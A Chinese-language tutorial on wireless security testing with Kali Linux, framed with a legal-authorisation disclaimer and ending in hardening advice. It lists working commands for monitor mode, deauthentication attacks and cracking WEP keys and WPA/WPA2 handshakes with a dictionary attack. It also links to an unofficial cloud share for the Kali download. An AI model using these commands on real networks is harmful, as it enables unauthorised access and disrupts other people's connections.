在校园宿舍、办公园区、咖啡馆等场景中,无线网络的普及让网络连接变得便捷高效,但加密配置不当、弱密码使用、固件漏洞等问题也让无线网络成为网络攻击的重灾区。对于大学生和 IT 从业者来说,掌握无线网络安全测试技能,不仅能应对课程实践、项目需求,更能在求职就业中增添核心竞争力。
Kali Linux 作为渗透测试的专用系统,内置了 aircrack-ng、Wireshark、kismet 等多款专业无线网络测试工具,无需额外复杂配置即可开展实操。本文将从 合法合规 前提出发,以「工具使用 + 步骤拆解 + 实战演示」的方式,带你一步步掌握无线网络安全测试的核心流程,新手也能直接落地操作。
Kali Linux 最新版本获取: https://pan.quark.cn/s/ff58f9f0e064
⚠️ 合法性声明(必读)#
- 原作者 Kali与编程
首先必须明确底线:所有测试操作仅能在合法授权范围内进行。
你只能对 自己拥有所有权 或 已获得网络所有者书面许可 的无线网络开展测试,严禁未经授权入侵他人网络、窃取数据、干扰网络运行等违法行为,否则可能触犯《网络安全法》《刑法》等法律法规。
这是网络安全从业者最基本的职业操守,也是避免踩坑的关键前提。
一、环境准备#
1️⃣ 硬件要求#
-
一块 支持监听模式(Monitor Mode) 的无线网卡
-
内置网卡大多不支持,推荐外置 USB 无线网卡
- 如:TP-LINK TL-WN722N(v1 / v2)
2️⃣ 系统准备#
- 安装最新版 Kali Linux
- 切换至 root 权限:
sudo su后续所有工具均需 root 权限运行。
二、激活无线网卡监听模式#
监听模式是无线网络测试的基础,可捕获周边所有无线网络的数据包。
操作步骤#
- 查看无线网卡名称:
ip addr常见名称为 wlan0(多网卡时可能是 wlan1)。
- 关闭可能干扰监听模式的进程:
airmon-ng check kill- 启动监听模式:
airmon-ng start wlan0成功后会看到提示:
monitor mode enabled on wlan0mon- 验证监听模式:
iwconfig若 wlan0mon 的 Mode 显示为 Monitor,说明激活成功。
三、扫描周边无线网络并收集信息#
核心目标是获取:
- SSID(网络名称)
- BSSID(路由器 MAC 地址)
- CH(信道)
- ENC(加密方式)
扫描命令#
airodump-ng wlan0mon关键字段说明#
- SSID:无线网络名称(隐藏网络显示为空)
- BSSID:路由器物理地址(核心标识)
- CH:信道(1–13)
- ENC:加密方式(WEP / WPA / WPA2 / WPA3)
- PWR:信号强度(越接近 0 越强)
记录目标网络信息后,按 Ctrl + C 停止扫描。
四、针对不同加密方式的漏洞测试(核心)#
场景 1:WEP 加密网络(安全性极低)#
1. 锁定目标并抓包#
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_test wlan0mon2. 发送解除认证数据包#
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon当 Data 数值足够大时,会自动显示:
KEY FOUND! [ XXXX-XXXX-XXXX-XXXX ]说明 WEP 密钥已成功获取。
场景 2:WPA / WPA2 加密网络(主流)#
1. 捕获握手包#
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_test wlan0mon2. 强制客户端重连(如已有客户端)#
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon若看到:
WPA handshake: AA:BB:CC:DD:EE:FF说明握手包捕获成功。
3. 字典攻击破解#
gunzip /usr/share/wordlists/rockyou.txt.gz
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_test-01.cap弱密码将很快被破解并显示:
KEY FOUND! [ password ]五、数据包深度分析(Wireshark)#
wireshark重点分析方向#
- 明文传输漏洞(HTTP 数据)
- 重放攻击风险(802.11 Sequence Control)
- 敏感信息泄露(Beacon 帧中的型号、固件版本)
补充工具:Kismet#
kismet可探测隐藏 SSID,并还原网络信息。
六、漏洞修复与安全加固建议#
- 使用 WPA3 或 WPA2-AES 加密
- 密码 ≥ 12 位,包含大小写字母、数字、符号
- 关闭 WPS、限制 MAC 地址
- 定期更新路由器固件
- 修改默认管理地址和管理员密码
- 公共 WiFi 下避免访问敏感业务
七、收尾与规范操作#
- 生成完整测试报告(漏洞、风险、修复建议)
- 关闭监听模式:
airmon-ng stop wlan0mon
systemctl start NetworkManager恢复正常网络状态,避免影响日常使用。
本文仅用于 网络安全学习与防御研究,请严格遵守法律与职业道德。